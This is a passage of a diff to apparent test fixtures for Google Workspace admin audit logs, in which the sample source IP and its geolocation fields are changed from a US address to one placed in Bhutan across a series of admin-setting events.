+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -77,26 +73,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 472,
+        "log.offset": 471,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -117,7 +109,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -131,26 +123,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 982,
+        "log.offset": 980,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -171,7 +159,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -187,26 +175,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1457,
+        "log.offset": 1454,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -227,7 +211,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -239,26 +223,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2002,
+        "log.offset": 1998,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -279,7 +259,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -291,26 +271,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2400,
+        "log.offset": 2395,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -331,7 +307,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -343,26 +319,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2771,
+        "log.offset": 2765,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -383,7 +355,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -395,26 +367,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3144,
+        "log.offset": 3137,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -435,7 +403,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -447,26 +415,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3520,
+        "log.offset": 3512,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -487,7 +451,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -501,26 +465,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3896,
+        "log.offset": 3887,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -541,7 +501,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -553,26 +513,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4365,
+        "log.offset": 4355,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -593,7 +549,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -605,26 +561,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4733,
+        "log.offset": 4722,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -645,7 +597,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -657,26 +609,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5101,
+        "log.offset": 5089,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -697,7 +645,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
